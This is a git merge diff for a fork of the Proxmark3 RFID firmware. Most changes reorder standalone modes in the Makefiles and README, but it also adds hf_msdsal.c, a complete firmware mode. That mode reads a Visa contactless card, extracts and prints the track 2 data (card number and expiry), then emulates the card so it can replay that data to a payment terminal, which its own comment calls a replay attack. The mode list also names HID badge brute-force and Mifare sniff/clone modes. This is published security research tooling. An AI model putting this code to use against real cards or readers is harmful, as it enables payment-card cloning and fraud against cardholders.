Merge pull request #2 from RfidResearchGroup/master

Update
2025-08-21 22:03:42 -07:00 · 2020-04-25 12:00:27 +02:00 · 2020-04-25 12:00:27 +02:00 · b6de6ac159
commit b6de6ac159
parent 1770c1e37c 0e1b1e166b
37 changed files with 679 additions and 707 deletions
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@ -3,6 +3,7 @@ All notable changes to this project will be documented in this file.
 This project uses the changelog in accordance with [keepchangelog](http://keepachangelog.com/). Please use this to write notable changes, which is not the same as git commit log...
 ## [unreleased][unreleased]
 - Added `HF_MSDSAL` standalone mode which read and emulate Visa EMV cards (@Netxing)
 - Added Mifare Ultralight tear off experiment (@cintainfinita and @fukmar)
 - Added Mifare Desfire Read/Write/Create files/records/values functionality and several fixes to `hf mfdes` (@bkerler)
 - Added CreateStdFile command to Mifare `hf mfdes` (@bkerler)
--- a/README.md
+++ b/README.md
@ -15,13 +15,13 @@
 |[Development](#development) | **[Important notes on ModemManager for Linux users](/doc/md/Installation_Instructions/ModemManager-Must-Be-Discarded.md)** | [Validating proxmark client functionality](/doc/md/Use_of_Proxmark/1_Validation.md) |
 |[Why didn't you base it on official Proxmark3 Master?](#why-didnt-you-base-it-on-official-proxmark3-master)| **[Homebrew (Mac OS X) & Upgrading HomeBrew Tap Formula](/doc/md/Installation_Instructions/Mac-OS-X-Homebrew-Installation-Instructions.md)** | [First Use and Verification](/doc/md/Use_of_Proxmark/2_Configuration-and-Verification.md)|
 |[Proxmark3 GUI](#proxmark3-gui)|**[Setup and build for Windows](/doc/md/Installation_Instructions/Windows-Installation-Instructions.md)**|[Commands & Features](/doc/md/Use_of_Proxmark/3_Commands-and-Features.md)|
-|[Issues](#issues)|[Blue shark manual](/doc/bt_manual_v10.md) |[Advanced compilation parameters](/doc/md/Use_of_Proxmark/4_Advanced-compilation-parameters.md)|
+|[Issues](#issues)|[Blue shark manual](/doc/bt_manual_v10.md) ||
 |[Notes on UART](/doc/uart_notes.md)|[Maintainers](/doc/md/Development/Maintainers.md)|[Command Cheat sheet](/doc/cheatsheet.md)|
-|[Notes on frame format](/doc/new_frame_format.md)||[More cheat sheets](https://github.com/RfidResearchGroup/proxmark3/wiki/More-cheat-sheets)|
+|[Notes on frame format](/doc/new_frame_format.md)|[Advanced compilation parameters](/doc/md/Use_of_Proxmark/4_Advanced-compilation-parameters.md)|[More cheat sheets](https://github.com/RfidResearchGroup/proxmark3/wiki/More-cheat-sheets)|
 |[Notes on external flash](/doc/ext_flash_notes.md)||[EMV](/doc/emv_notes.md)|
-|[Notes on Termux / Android](/doc/termux_notes.md)||[Troubleshooting](/doc/md/Installation_Instructions/Troubleshooting.md)|
+|[Notes on Termux / Android](/doc/termux_notes.md)|**[Troubleshooting](/doc/md/Installation_Instructions/Troubleshooting.md)**|[Complete client command set](/doc/commands.md)|
-|[Notes on tracedata / wireshark](/doc/trace_notes.md)||[JTAG](/doc/jtag_notes.md)|
+|[Notes on tracedata / wireshark](/doc/trace_notes.md)|**[JTAG](/doc/jtag_notes.md)**||
-|[Notes on loclass](/doc/loclass_notes.md)||[Complete client command set](/doc/commands.md)|
+|[Notes on loclass](/doc/loclass_notes.md)|||
 |[Notes on paths](/doc/path_notes.md)|||
 |[Developing standalone mode](/armsrc/Standalone/readme.md)|[Wiki about standalone mode](https://github.com/RfidResearchGroup/proxmark3/wiki/Standalone-mode) ||
 |[Donations](#Donations)|||
--- a/armsrc/Standalone/Makefile.hal
+++ b/armsrc/Standalone/Makefile.hal
@ -1,6 +1,6 @@
 # Default standalone if no standalone specified
-DEFAULT_STANDALONE=LF_SAMYRUN
+DEFAULT_STANDALONE=HF_MSDSAL
-HELP_EXAMPLE_STANDALONE=HF_YOUNG 
+HELP_EXAMPLE_STANDALONE=LF_SAMYRUN
 # (you can set explicitly STANDALONE= to disable standalone modes)
 STANDALONE?=$(DEFAULT_STANDALONE)
 STANDALONE_REQ_DEFS=
@ -11,51 +11,54 @@ define KNOWN_STANDALONE_DEFINITIONS
 +==========================================================+
 | (empty)         | No standalone mode                     |
 +----------------------------------------------------------+
-| LF_SAMYRUN      | HID26 read/clone/sim                   |
+| LF_SKELETON     | standalone mode skeleton               |
 | (default)       | - Samy Kamkar                          |
 +----------------------------------------------------------+
 | LF_ICERUN       | standalone mode skeleton               |
 |                 | - iceman                               |
 +----------------------------------------------------------+
 | LF_PROXBRUTE    | HID ProxII bruteforce                  |
 |                 | - Brad Antoniewicz                     |
 +----------------------------------------------------------+
 | LF_HIDBRUTE     | HID corporate 1000 bruteforce          |
 |                 | - Federico dotta & Maurizio Agazzini   |
 +----------------------------------------------------------+
 | HF_YOUNG        | Mifare sniff/simulation                |
 |                 | - Craig Young                          |
 +----------------------------------------------------------+
 | HF_MATTYRUN     | Mifare sniff/clone                     |
 |                 | - Matías A. Ré Medina                  |
 +----------------------------------------------------------+
 | HF_COLIN        | Mifare ultra fast sniff/sim/clone      |
 | (RDV4 only)     | - Colin Brigato                        |
 +----------------------------------------------------------+
 | HF_BOG          | 14a sniff with ULC/ULEV1/NTAG auth     |
 | (RDV4 only)     | storing in flashmem - Bogito           |
 +----------------------------------------------------------+
 | HF_14ASNIFF     | 14a sniff to flashmem                  |
 | (RDV4 only)     |                                        |
 +----------------------------------------------------------+
 | LF_ICEHID       | LF HID collector to flashmem           |
 | (RDV4 only)     |                                        |
 +----------------------------------------------------------+
 | LF_EM4100EMUL   | Simulate predefined em4100 tags only   |
 |                 |                                        |
 +----------------------------------------------------------+
 | LF_EM4100RWC    | Read/simulate em4100 tags & clone it   |
 |                 | to T555x tags                          |
 +----------------------------------------------------------+
 | LF_HIDBRUTE     | HID corporate 1000 bruteforce          |
 |                 | - Federico dotta & Maurizio Agazzini   |
 +----------------------------------------------------------+
 | LF_ICEHID       | LF HID collector to flashmem           |
 | (RDV4 only)     |                                        |
 +----------------------------------------------------------+
 | LF_PROXBRUTE    | HID ProxII bruteforce                  |
 |                 | - Brad Antoniewicz                     |
 +----------------------------------------------------------+
 | LF_SAMYRUN      | HID26 read/clone/sim                   |
 |                 | - Samy Kamkar                          |
 +----------------------------------------------------------+
 | HF_14ASNIFF     | 14a sniff to flashmem                  |
 | (RDV4 only)     |                                        |
 +----------------------------------------------------------+
 | HF_BOG          | 14a sniff with ULC/ULEV1/NTAG auth     |
 | (RDV4 only)     | storing in flashmem - Bogito           |
 +----------------------------------------------------------+
 | HF_COLIN        | Mifare ultra fast sniff/sim/clone      |
 | (RDV4 only)     | - Colin Brigato                        |
 +----------------------------------------------------------+
 | HF_LEGIC        | Read/simulate Legic Prime tags         |
 |                 | storing in flashmem                    |
 +----------------------------------------------------------+
 | HF_MATTYRUN     | Mifare sniff/clone                     |
 |                 | - Matías A. Ré Medina                  |
 +----------------------------------------------------------+
 | HF_MSDSAL       | Read and emulate MSD Visa cards        |
 | (default)       | - Salvador Mendoza                     |
 +----------------------------------------------------------+
 | HF_YOUNG        | Mifare sniff/simulation                |
 |                 | - Craig Young                          |
 +----------------------------------------------------------+
 endef
-STANDALONE_MODES := LF_SAMYRUN LF_ICERUN LF_PROXBRUTE LF_HIDBRUTE LF_ICEHID LF_EM4100EMUL LF_EM4100RWC
+STANDALONE_MODES := LF_SKELETON LF_EM4100EMUL LF_EM4100RWC LF_HIDBRUTE LF_ICEHID LF_PROXBRUTE LF_SAMYRUN
-STANDALONE_MODES += HF_YOUNG HF_MATTYRUN HF_COLIN HF_BOG HF_14ASNIFF HF_LEGIC
+STANDALONE_MODES += HF_14ASNIFF HF_BOG HF_COLIN HF_LEGIC HF_MATTYRUN HF_MSDSAL HF_YOUNG
 STANDALONE_MODES_REQ_SMARTCARD :=
-STANDALONE_MODES_REQ_FLASH := HF_COLIN HF_BOG HF_14ASNIFF LF_ICEHID
+STANDALONE_MODES_REQ_FLASH := LF_ICEHID HF_14ASNIFF HF_BOG HF_COLIN
 ifneq ($(filter $(STANDALONE),$(STANDALONE_MODES)),)
    STANDALONE_PLATFORM_DEFS += -DWITH_STANDALONE_$(STANDALONE)
    ifneq ($(filter $(STANDALONE),$(STANDALONE_MODES_REQ_SMARTCARD)),)
--- a/armsrc/Standalone/Makefile.inc
+++ b/armsrc/Standalone/Makefile.inc
@ -1,9 +1,9 @@
 # Generic standalone Mode injection of source code
 SRC_STANDALONE = placeholder.c
-# WITH_STANDALONE_LF_ICERUN
+# WITH_STANDALONE_LF_SKELETON
-ifneq (,$(findstring WITH_STANDALONE_LF_ICERUN,$(APP_CFLAGS)))
+ifneq (,$(findstring WITH_STANDALONE_LF_SKELETON,$(APP_CFLAGS)))
-    SRC_STANDALONE = lf_icerun.c
+    SRC_STANDALONE = lf_skeleton.c
 endif
 # WITH_STANDALONE_LF_SAMYRUN
 ifneq (,$(findstring WITH_STANDALONE_LF_SAMYRUN,$(APP_CFLAGS)))
@ -53,3 +53,7 @@ endif
 ifneq (,$(findstring WITH_STANDALONE_HF_LEGIC,$(APP_CFLAGS)))
   SRC_STANDALONE = hf_legic.c
 endif
 # WITH_STANDALONE_LF_MSDSAL
 ifneq (,$(findstring WITH_STANDALONE_HF_MSDSAL,$(APP_CFLAGS)))
    SRC_STANDALONE = hf_msdsal.c
 endif
--- a/armsrc/Standalone/hf_msdsal.c
+++ b/armsrc/Standalone/hf_msdsal.c
@ -0,0 +1,454 @@
 //-----------------------------------------------------------------------------
 // Salvador Mendoza (salmg.net), 2020
 //
 // This code is licensed to you under the terms of the GNU GPL, version 2 or,
 // at your option, any later version. See the LICENSE.txt file for the text of
 // the license.
 //-----------------------------------------------------------------------------
 // Code for reading and emulating 14a technology aka MSDSal by Salvador Mendoza
 //-----------------------------------------------------------------------------
 #include "standalone.h"
 #include "proxmark3_arm.h"
 #include "appmain.h"
 #include "fpgaloader.h"
 #include "util.h"
 #include "dbprint.h"
 #include "ticks.h"
 #include "string.h"
 #include "BigBuf.h"
 #include "iso14443a.h"
 #include "protocols.h"
 #include "cmd.h"
 void ModInfo(void) {
    DbpString("  HF - Reading Visa cards & Emulating a Visa MSD Transaction(ISO14443) - (Salvador Mendoza)");
 }
 /* This standalone implements two different modes: reading and emulating.
 *
 * The initial mode is reading with LED A as guide.
 * In this mode, the Proxmark expects a Visa Card,
 * and will act as card reader. Trying to find track 2.
 *
 * If the Proxmark found a track 2, it will change to emulation mode (LED C) automatically.
 * During this mode the Proxmark will behave as card, emulating a Visa MSD transaction
 * using the pre-saved track2 from the previous reading.
 *
 * It is possible to jump from mode to another by simply pressing the button.
 * However, to jump from reading to emulation mode, the LED C as to be on, which
 * means having a track 2 in memory.
 *
 * Keep pressing the button down will quit the standalone cycle.
 *
 * LEDs:
 * LED A = in reading mode
 * LED C = in emulation(a track 2 in memory) mode
 * LED A + LED C = in reading mode, but you can jump back to emulation mode by pressing the button
 * LED B = receiving/sending commands, activity
 *
 *
 * Reading or emulating ISO-14443A technology is not limited to payment cards. This example
 * was not only designed to make a replay attack, but to open new possibilities in the ISO-14443A
 * technologies. Be brave enough to share your knowledge & inspire others. Salvador Mendoza.
 */
 uint8_t ppdol [255] = {0x80, 0xA8, 0x00, 0x00, 0x02, 0x83, 0x00}; // Default GET PROCESSING
 uint8_t treatPDOL(uint8_t *apdu) {                  //Generate GET PROCESSING
    uint8_t plen = 7;
    //PDOL Format: 80 A8 00 00 + (PDOL Length+2) + 83 + PDOL Length + PDOL + 00
    for (uint8_t i = 1; i <= apdu[0]; i++) {          //Magic stuff, the generation order is important
        if (apdu[i] == 0x9F && apdu[i + 1] == 0x66) {   //Terminal Transaction Qualifiers
            ppdol[plen] = 0xF6;
            ppdol[plen + 1] = 0x20;
            ppdol[plen + 2] = 0xC0;
            ppdol[plen + 3] = 0x00;
            plen += 4;
            i += 2;
        } else if (apdu[i] == 0x9F && apdu[i + 1] == 0x1A) { //Terminal Country Code
            ppdol[plen] = 0x9F;
            ppdol[plen + 1] = 0x1A;
            plen += 2;
            i += 2;
        } else if (apdu[i] == 0x5F && apdu[i + 1] == 0x2A) { //Transaction Currency Code
            ppdol[plen] = 0x5F;
            ppdol[plen + 1] = 0x2A;
            plen += 2;
            i += 2;
        } else if (apdu[i] == 0x9A) {                   //Transaction Date
            ppdol[plen] = 0x9A;
            ppdol[plen + 1] = 0x9A;
            ppdol[plen + 2] = 0x9A;
            plen += 3;
            i += 1;
        } else if (apdu[i] == 0x95) {                   //Terminal Verification Results
            ppdol[plen] = 0x95;
            ppdol[plen + 1] = 0x95;
            ppdol[plen + 2] = 0x95;
            ppdol[plen + 3] = 0x95;
            ppdol[plen + 4] = 0x95;
            plen += 5;
            i += 1;
        } else if (apdu[i] == 0x9C) {                   //Transaction Type
            ppdol[plen] = 0x9C;
            plen += 1;
            i += 1;
        } else if (apdu[i] == 0x9F && apdu[i + 1] == 0x37) { //Unpredictable Number
            ppdol[plen] = 0x9F;
            ppdol[plen + 1] = 0x37;
            ppdol[plen + 2] = 0x9F;
            ppdol[plen + 3] = 0x37;
            plen += 4;
            i += 2;
        } else {                                        //To the others, add "0" to complete the format depending on its range
            uint8_t u = apdu[i + 2];
            while (u > 0) {
                ppdol[plen] = 0;
                plen += 1;
                u--;
            }
            i += 2;
        }
    }
    ppdol[4] = (plen + 2) - 7;                        // Length of PDOL + 2
    ppdol[6] = plen - 7;                              // Real length
    plen++;                                           // +1 because the last 0
    ppdol[plen] = 0x00;                               // Add the last 0 to the challenge
    return plen;
 }
 void RunMod() {
    StandAloneMode();
    Dbprintf(_YELLOW_(">>")  "Reading Visa cards & Emulating a Visa MSD Transaction a.k.a. MSDSal Started<<");
    FpgaDownloadAndGo(FPGA_BITSTREAM_HF);
    //For reading process
    iso14a_card_select_t card_a_info;
    uint8_t apdubuffer[MAX_FRAME_SIZE] = { 0x00 };
    //Specific for Visa cards: select ppse, select Visa AID, GET PROCESSING, SFI
    uint8_t ppse[20] = {0x00, 0xA4, 0x04, 0x00, 0x0e, 0x32, 0x50, 0x41, 0x59, 0x2e, 0x53, 0x59, 0x53, 0x2e, 0x44, 0x44, 0x46, 0x30, 0x31, 0x00};
    uint8_t visa[13] = {0x00, 0xA4, 0x04, 0x00, 0x07, 0xa0, 0x00, 0x00, 0x00, 0x03, 0x10, 0x10, 0x00};
    uint8_t processing [8] = {0x80, 0xA8, 0x00, 0x00, 0x02, 0x83, 0x00, 0x00};
    uint8_t sfi[5] = {0x00, 0xb2, 0x01, 0x0c, 0x00};
    uint8_t *apdus[4] = {ppse, visa, processing, sfi};
    uint8_t apdusLen [4] = { sizeof(ppse), sizeof(visa), sizeof(processing), sizeof(sfi)};
    uint8_t pdol[50], plen = 8;
    bool existpdol;
    // - MSD token card format -
    //
    //Card number: 4412 3456 0578 1234
    //Expiration date: 17/11
    //Service code: 201
    //Discretionary data: 0000030000991
    //char token[19] = {0x44,0x12,0x34,0x56,0x05,0x78,0x12,0x34,0xd1,0x71,0x12,0x01,0x00,0x00,0x03,0x00,0x00,0x99,0x1f};
    //
    // It is possible to initialize directly the emulation mode, having "token" with data and set "chktoken" = true ;)
    //
    char token[19] = {0x00};
    bool chktoken = false;
 //For emulation steps
 #define ATQA      0
 #define UIDC1     1
 #define SAKC1     3
 #define RATS      5
 #define SIGNATURE 7
 // Allocate 512 bytes for the dynamic modulation, created when the reader queries for it
 // Such a response is less time critical, so we can prepare them on the fly
 #define DYNAMIC_RESPONSE_BUFFER_SIZE 64
 #define DYNAMIC_MODULATION_BUFFER_SIZE 512
    uint8_t flags = FLAG_4B_UID_IN_DATA; //UID 4 bytes(could be 7 bytes if needed it)
    uint8_t data[PM3_CMD_DATA_SIZE] = {0x00}; // in case there is a read command received we shouldn't break
    uint8_t visauid[7] = {0x01, 0x02, 0x03, 0x04};
    memcpy(data, visauid, 4);
    // to initialize the emulation
    uint8_t tagType = 4; // 4 = ISO/IEC 14443-4 - javacard (JCOP)
    tag_response_info_t *responses;
    uint32_t cuid = 0;
    uint32_t counters[3] = { 0x00, 0x00, 0x00 };
    uint8_t tearings[3] = { 0xbd, 0xbd, 0xbd };
    uint8_t pages = 0;
    // command buffers
    uint8_t receivedCmd[MAX_FRAME_SIZE] = { 0x00 };
    uint8_t receivedCmdPar[MAX_PARITY_SIZE] = { 0x00 };
    uint8_t dynamic_response_buffer[DYNAMIC_RESPONSE_BUFFER_SIZE];
    uint8_t dynamic_modulation_buffer[DYNAMIC_MODULATION_BUFFER_SIZE];
    // to know the transaction status
    uint8_t prevCmd = 0;
    // handler - command responses
    tag_response_info_t dynamic_response_info = {
        .response = dynamic_response_buffer,
        .response_n = 0,
        .modulation = dynamic_modulation_buffer,
        .modulation_n = 0
    };
 // States for standalone
 #define STATE_READ 0
 #define STATE_EMU  1
    uint8_t state = STATE_READ;
    //Checking if the user wants to go directly to emulation mode using a hardcoded track 2
    if (chktoken == true && token[0] != 0x00) {
        state = STATE_EMU;
        Dbprintf(_YELLOW_("[") "Initialized emulation mode " _YELLOW_("]"));
        DbpString("\n"_YELLOW_("!!") "Waiting for a card reader...");
    } else {
        DbpString(_YELLOW_("[") "Initialized reading mode " _YELLOW_("]"));
        DbpString("\n"_YELLOW_("!!") "Waiting for a Visa card...");
    }
    for (;;) {
        WDT_HIT();
        // exit from RunMod, send a usbcommand.
        if (data_available()) break;
        // Was our button held down or pressed?
        int button_pressed = BUTTON_HELD(1000);
        if (button_pressed  == 1)        //Holding down the button
            break;
        else if (button_pressed == -1) { //Pressing one time change between reading & emulation
            if (state == STATE_READ) {
                if (chktoken == true && token[0] != 0x00) {  //Only change to emulation if it saved a track 2 in memory
                    state = STATE_EMU;
                    Dbprintf(_YELLOW_("[") "In emulation mode " _YELLOW_("]"));
                } else
                    Dbprintf(_YELLOW_("!!") "Nothing in memory to emulate");
            } else {
                state = STATE_READ;
                Dbprintf(_YELLOW_("[") "In reading mode " _YELLOW_("]"));
            }
        }
        SpinDelay(500);
        if (state == STATE_READ) {
            LED_A_ON();
            if (chktoken)
                LED_C_ON();
            iso14443a_setup(FPGA_HF_ISO14443A_READER_MOD);
            if (iso14443a_select_card(NULL, &card_a_info, NULL, true, 0, false)) {
                Dbprintf(_YELLOW_("+") "Found ISO 14443 Type A!");
                for (uint8_t i = 0; i < 4; i++) {
                    chktoken = false;
                    LED_C_OFF();
                    LED_B_ON();
                    uint8_t apdulen = iso14_apdu(apdus[i], (uint16_t) apdusLen[i], false, apdubuffer, NULL);
                    if (apdulen > 0) {
                        Dbprintf(_YELLOW_("[") "Proxmark command " _YELLOW_("]"));
                        Dbhexdump(apdusLen[i], apdus[i], false);
                        Dbprintf(_GREEN_("[") "Card answer " _GREEN_("]"));
                        Dbhexdump(apdulen - 2, apdubuffer, false);
                        Dbprintf("----");
                        for (uint8_t u = 0; u < apdulen; u++) {
                            if (i == 1) {
                                if (apdubuffer[u] == 0x9F && apdubuffer[u + 1] == 0x38) {             //Check for PDOL
                                    for (uint8_t e = 0; e <= apdubuffer[u + 2]; e++)
                                        pdol[e] =  apdubuffer[u + e + 2];
                                    plen = treatPDOL(pdol);                                             //Generate a challenge
                                    apdus[2] = ppdol;
                                    apdusLen[2] = plen;
                                    existpdol = true;
                                }
                            } else if (i == 3) {
                                if (apdubuffer[u] == 0x57 && apdubuffer[u + 1] == 0x13 && !chktoken) { //Find track 2
                                    chktoken = true;
                                    memcpy(&token, &apdubuffer[u + 2], 19);
                                    break;
                                }
                            }
                        }
                        if (i == 1) {
                            Dbprintf(_GREEN_("[") "Challenge generated " _GREEN_("]"));
                            Dbhexdump(plen, existpdol ? ppdol : processing, false);
                        }
                    } else {
                        Dbprintf(_YELLOW_("!!") "Error reading the card");
                    }
                    LED_B_OFF();
                }
                if (chktoken) {
                    Dbprintf(_RED_("[") "Track 2 " _RED_("]"));
                    Dbhexdump(19, (uint8_t *)token, false);
                    Dbprintf(_YELLOW_("!!") "Card number");
                    Dbhexdump(8, (uint8_t *)token, false);
                    DbpString("---");
                    LED_C_ON();
                    state = STATE_EMU;
                    Dbprintf(_YELLOW_("[") "Initialized emulation mode " _YELLOW_("]"));
                    DbpString("\n"_YELLOW_("!!") "Waiting for a card reader...");
                }
            }
        } else if (state == STATE_EMU) {
            LED_A_OFF();
            LED_C_ON();
            // free eventually allocated BigBuf memory but keep Emulator Memory
            BigBuf_free_keep_EM();
            if (SimulateIso14443aInit(tagType, flags, data, &responses, &cuid, counters, tearings, &pages) == false) {
                BigBuf_free_keep_EM();
                reply_ng(CMD_HF_MIFARE_SIMULATE, PM3_EINIT, NULL, 0);
                DbpString(_YELLOW_("!!") "Error initializing the emulation process!");
                SpinDelay(500);
                state = STATE_READ;
                DbpString(_YELLOW_("[") "Initialized reading mode " _YELLOW_("]"));
                DbpString("\n" _YELLOW_("!!") "Waiting for a Visa card...");
                break;
            }
            // We need to listen to the high-frequency, peak-detected path.
            iso14443a_setup(FPGA_HF_ISO14443A_TAGSIM_LISTEN);
            int len = 0;              // command length
            int retval = PM3_SUCCESS; // to check emulation status
            clear_trace();
            set_tracing(true);
            for (;;) {
                LED_B_OFF();
                // Clean receive command buffer
                if (!GetIso14443aCommandFromReader(receivedCmd, receivedCmdPar, &len)) {
                    Dbprintf(_YELLOW_("!!") "Emulator stopped");
                    retval = PM3_EOPABORTED;
                    break;
                }
                tag_response_info_t *p_response = NULL;
                LED_B_ON();
                // dynamic_response_info will be in charge of responses
                dynamic_response_info.response_n = 0;
                // Checking the commands order is important and elemental
                if (receivedCmd[0] == ISO14443A_CMD_REQA && len == 1) {         // Received a REQUEST
                    DbpString(_YELLOW_("+") "REQUEST Received");
                    p_response = &responses[ATQA];
                } else if (receivedCmd[0] == ISO14443A_CMD_HALT && len == 4) {  // Received a HALT
                    DbpString(_YELLOW_("+") "Received a HALT");
                    p_response = NULL;
                } else if (receivedCmd[0] == ISO14443A_CMD_WUPA && len == 1) {  // Received a WAKEUP //Este!!
                    DbpString(_YELLOW_("+") "WAKEUP Received");
                    p_response = &responses[ATQA];
                    prevCmd = 0;
                } else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && len == 2) {  // Received request for UID (cascade 1)
                    DbpString(_YELLOW_("+") "Request for UID C1");
                    p_response = &responses[UIDC1];
                } else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && len == 9) {  // Received a SELECT (cascade 1)
                    DbpString(_YELLOW_("+") "Request for SELECT S1");
                    p_response = &responses[SAKC1];
                } else if (receivedCmd[0] == ISO14443A_CMD_RATS && len == 4) {  // Received a RATS request
                    DbpString(_YELLOW_("+") "Request for RATS");
                    p_response = &responses[RATS];
                } else {
                    Dbprintf(_YELLOW_("[") "Card reader command " _YELLOW_("]"));
                    Dbhexdump(len, receivedCmd, false);
                    if (receivedCmd[0] == 0x02 || receivedCmd[0] == 0x03) { //Emulate a Visa MSD(Magnetic stripe data) card
                        uint8_t ppsea[39] = {0x6F, 0x23, 0x84, 0x0E, 0x32, 0x50, 0x41, 0x59, 0x2E, 0x53, 0x59, 0x53, 0x2E, 0x44, 0x44, 0x46, 0x30, 0x31, 0xA5, 0x11, 0xBF, 0x0C, 0x0E, 0x61, 0x0C, 0x4F, 0x07, 0xA0, 0x00, 0x00, 0x00, 0x03, 0x10, 0x10, 0x87, 0x01, 0x01, 0x90, 0x00};
                        uint8_t processing[10] = {0x80, 0x06, 0x00, 0x80, 0x08, 0x01, 0x01, 0x00, 0x90, 0x00};
                        uint8_t visauid[34] = {0x6F, 0x1E, 0x84, 0x07, 0xA0, 0x00, 0x00, 0x00, 0x03, 0x10, 0x10, 0xA5, 0x13, 0x50, 0x0B, 0x56, 0x49, 0x53, 0x41, 0x20, 0x43, 0x52, 0x45, 0x44, 0x49, 0x54, 0x9F, 0x38, 0x03, 0x9F, 0x66, 0x02, 0x90, 0x00};
                        uint8_t last[4] =  {0x70, 0x15, 0x57, 0x13};
                        uint8_t card[25];
                        uint8_t statusapdu[2] = {0x90, 0x00};
                        uint8_t finished[2] = {0x6f, 0x00};
                        memcpy(&card[0], last, sizeof(last));
                        memcpy(&card[4], token, sizeof(token));
                        memcpy(&card[23], statusapdu, sizeof(statusapdu));
                        dynamic_response_info.response[0] = receivedCmd[0];
                        //Depending on card reader commands, the Proxmark will answer to fool the reader
                        if (receivedCmd[2] == 0xA4 && receivedCmd[6] == 0x32 && prevCmd == 0) {                                 //Respond with PPSE
                            memcpy(&dynamic_response_info.response[1], ppsea, sizeof(ppsea));
                            dynamic_response_info.response_n = sizeof(ppsea) + 1;
                            prevCmd++;
                        } else if (receivedCmd[2] == 0xA4 && receivedCmd[10] == 0x03 && receivedCmd[11] == 0x10 && prevCmd == 1) { //Respond Visa AID
                            memcpy(&dynamic_response_info.response[1], visauid, sizeof(visauid));
                            dynamic_response_info.response_n = sizeof(visauid) + 1;
                            prevCmd++;
                        } else if (receivedCmd[1] == 0x80 && receivedCmd[2] == 0xA8 && receivedCmd[6] == 0x83  && prevCmd == 2) { //GET PROCESSING
                            memcpy(&dynamic_response_info.response[1], processing, sizeof(processing));
                            dynamic_response_info.response_n = sizeof(processing) + 1;
                            prevCmd++;
                        } else if (receivedCmd[1] == 0x00 && receivedCmd[2] == 0xB2  && prevCmd == 3) {                         //SFI
                            memcpy(&dynamic_response_info.response[1], card, sizeof(card));
                            dynamic_response_info.response_n = sizeof(card) + 1;
                            prevCmd++;
                        } else {
                            memcpy(&dynamic_response_info.response[1], finished, sizeof(finished));
                            dynamic_response_info.response_n = sizeof(finished) + 1;
                            if (prevCmd == 5) {
                                prevCmd = 0;
                            }
                        }
                    } else {
                        Dbprintf(_YELLOW_("!!") "Received unknown command!");
                        if (prevCmd < 4) {
                            memcpy(dynamic_response_info.response, receivedCmd, len);
                            dynamic_response_info.response_n = len;
                        } else {
                            dynamic_response_info.response_n = 0;
                        }
                    }
                }
                if (dynamic_response_info.response_n > 0) {
                    Dbprintf(_GREEN_("[") "Proxmark3 answer " _GREEN_("]"));
                    Dbhexdump(dynamic_response_info.response_n, dynamic_response_info.response, false);
                    Dbprintf("----");
                    // Add CRC bytes, always used in ISO 14443A-4 compliant cards
                    AddCrc14A(dynamic_response_info.response, dynamic_response_info.response_n);
                    dynamic_response_info.response_n += 2;
                    if (prepare_tag_modulation(&dynamic_response_info, DYNAMIC_MODULATION_BUFFER_SIZE) == false) {
                        SpinDelay(500);
                        DbpString(_YELLOW_("!!") "Error preparing Proxmark to answer!");
                        continue;
                    }
                    p_response = &dynamic_response_info;
                }
                if (p_response != NULL) {
                    EmSendPrecompiledCmd(p_response);
                }
            }
            switch_off();
            set_tracing(false);
            BigBuf_free_keep_EM();
            reply_ng(CMD_HF_MIFARE_SIMULATE, retval, NULL, 0);
        }
    }
    DbpString(_YELLOW_("[=]") "exiting");
    LEDsoff();
 }
--- a/armsrc/Standalone/lf_em4100emul.c
+++ b/armsrc/Standalone/lf_em4100emul.c
@ -85,7 +85,7 @@ void RunMod() {
    Dbprintf("[=] >>  LF EM4100 simulator started  <<");
    int selected = 0; //selected slot after start
-    slots_count = sizeof(low) / sizeof(low[0]);
+    slots_count = ARRAYLEN(low);
    bba = BigBuf_get_addr();
    for (;;) {
        WDT_HIT();
--- a/armsrc/Standalone/lf_em4100rwc.c
+++ b/armsrc/Standalone/lf_em4100rwc.c
@ -129,7 +129,7 @@ void RunMod() {
    //      2 - simulate tag from selected slot
    //      3 - write to T5555 tag
    uint8_t state = 0;
-    slots_count = sizeof(low) / sizeof(low[0]);
+    slots_count = ARRAYLEN(low);
    bba = BigBuf_get_addr();
    LED_Slot(selected);
    for (;;) {
--- a/armsrc/Standalone/lf_skeleton.c
+++ b/armsrc/Standalone/lf_skeleton.c
@ -5,7 +5,7 @@
 // at your option, any later version. See the LICENSE.txt file for the text of
 // the license.
 //-----------------------------------------------------------------------------
-// main code for skeleton  aka IceRun by Iceman
+// main code for skeleton  by Iceman
 //-----------------------------------------------------------------------------
 #include "standalone.h" // standalone definitions
 #include "proxmark3_arm.h"
@ -15,19 +15,19 @@
 #include "dbprint.h"
 void ModInfo(void) {
-    DbpString("  LF skeleton mode -  aka IceRun (iceman)");
+    DbpString("  LF skeleton mode -  aka Skeleton (iceman)");
 }
 void RunMod() {
    StandAloneMode();
-    Dbprintf("[=] LF skeleton code a.k.a IceRun started");
+    Dbprintf("[=] LF skeleton code a.k.a Skeleton started");
    FpgaDownloadAndGo(FPGA_BITSTREAM_LF);
    // the main loop for your standalone mode
    for (;;) {
        WDT_HIT();
-        // exit from IceRun,   send a usbcommand.
+        // exit from RunMod,   send a usbcommand.
        if (data_available()) break;
        // Was our button held down or pressed?
--- a/armsrc/Standalone/readme.md
+++ b/armsrc/Standalone/readme.md
@ -3,7 +3,7 @@
 This contains functionality for different StandAlone modes. The fullimage will be built given the correct compiler flags used. Build targets for these files are contained in `Makefile.inc` and `Makefile.hal`
 If you want to implement a new standalone mode, you need to implement the methods provided in `standalone.h`.
-Have a look at the skeleton standalone mode called IceRun, in the files `lf_icerun.c lf_icerun.h`.
+Have a look at the skeleton standalone mode, in the file `lf_skeleton.c`.
 As it is now, you can only have one standalone mode installed at the time.  
@ -58,7 +58,7 @@ This leads to your next step, your DEFINE name needed in Makefile.
 ## Update MAKEFILE.HAL
-Add your mode to the `Makefile.hal` help and modes list:
+Add your mode to the `Makefile.hal` help and modes list (alphabetically):
 ```
 +==========================================================+
 | STANDALONE      | DESCRIPTION                            |
@ -68,24 +68,24 @@ Add your mode to the `Makefile.hal` help and modes list:
 | LF_FOO          | My foobar mode will make you coffee    |
 +----------------------------------------------------------+
-STANDALONE_MODES := LF_SAMYRUN LF_ICERUN LF_PROXBRUTE LF_HIDBRUTE LF_FOO
+STANDALONE_MODES := LF_... LF_FOO
